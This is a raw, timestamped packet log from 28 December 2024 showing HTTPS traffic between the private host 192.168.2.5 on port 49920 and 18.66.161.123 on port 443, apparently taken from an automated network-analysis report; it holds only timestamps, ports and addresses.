                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.797795057 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.797831059 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.797840118 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.797868013 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.797888994 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.809354067 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.809369087 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.809406996 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.809412956 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.809461117 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.823930979 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.823964119 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.823991060 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.823993921 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.824035883 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.851651907 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.851677895 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.851713896 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.851721048 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.851747990 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.851773977 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.970921993 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.970940113 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.970990896 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.970999956 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.971028090 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.971046925 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.975415945 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.975456953 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.975481033 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.975485086 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.975532055 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.980628967 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.980643988 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.980665922 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.980688095 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.980695009 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.980742931 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.985666037 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.985683918 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.985738039 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.985743046 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.985790968 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.989742994 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.989758968 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.989798069 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.989803076 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:51.989840984 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.005295992 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.005314112 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.005352020 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.005362034 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.005383968 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.026458025 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.026470900 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.026514053 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.026520967 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.026554108 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.051542997 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.051562071 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.051608086 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.051620007 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.051666021 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.158080101 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.162302971 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.162317038 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.162374020 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.162389040 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.162415028 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.167484999 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.167503119 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.167573929 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.167583942 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.171932936 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.171947002 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.172018051 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.172024012 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.176923037 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.176939011 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.177000999 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.177005053 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.177040100 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.184359074 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.184387922 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.184437037 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.184446096 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.184470892 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.197635889 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.197657108 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.197726011 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.197731972 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.225754976 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.225771904 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.225843906 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.225867987 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.225887060 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.350219011 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.350244045 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.350327015 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.350341082 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354336977 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354345083 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354370117 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354377985 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354392052 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354404926 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354418993 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354430914 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.354459047 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359261036 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359268904 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359280109 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359297991 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359337091 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359342098 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.359371901 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364527941 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364536047 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364543915 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364566088 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364598989 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364604950 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.364635944 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368861914 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368892908 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368901968 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368912935 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368927956 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368932009 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.368978024 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.376207113 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.376216888 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.376236916 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.376271009 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.376274109 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.376296997 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.389733076 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.389760971 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.389811993 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.389822006 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.389846087 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.417628050 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.417643070 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.417689085 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.417695045 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.417718887 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.543481112 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.543508053 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.543679953 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.543703079 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546607971 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546616077 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546642065 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546653032 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546662092 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546678066 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546689034 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546700001 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.546745062 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551418066 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551426888 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551450968 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551460028 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551475048 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551480055 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551492929 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551501989 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551505089 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551527977 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.551543951 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556299925 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556308031 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556337118 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556366920 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556374073 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556377888 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.556401014 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.560826063 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.560843945 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.560923100 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.560929060 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.568012953 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.568027020 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.568093061 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.568099022 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.581882000 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.581899881 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.582087994 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.582093000 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.610964060 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.611010075 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.611023903 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.611186028 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.611186028 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.611196041 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.738256931 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.738284111 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.738317966 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.738445997 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.738445997 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.738456011 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741373062 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741381884 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741401911 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741411924 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741421938 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741432905 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741440058 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741461992 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741467953 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.741486073 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746449947 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746463060 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746485949 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746495008 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746512890 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746520042 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.746562004 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.750950098 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.750963926 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.750992060 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.751022100 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.751028061 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.751033068 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.751054049 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.751069069 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.756057978 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.756077051 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.756143093 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.756150961 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.761054039 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.761074066 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.761121035 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.761130095 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.761141062 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.773685932 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.773703098 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.773792028 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.773803949 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.802510023 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.802530050 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.802694082 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.802694082 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.802710056 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.830528021 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.830580950 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.830605984 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.830614090 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.830656052 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.932135105 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.932147980 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.932193041 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.932317972 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.932317972 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.932324886 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.935708046 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.937271118 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.937287092 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.937350988 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.937360048 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.938783884 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.938842058 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.938848019 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.938885927 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.943711042 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.943726063 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.943783045 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.943789959 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.947717905 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.948215961 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.948231936 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.948278904 CET49920443192.168.2.518.66.161.123
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.948287010 CET4434992018.66.161.123192.168.2.5
                                                                                                                                                                                                                                    Dec 28, 2024 22:21:52.948312998 CET49920443192.168.2.518.66.161.123
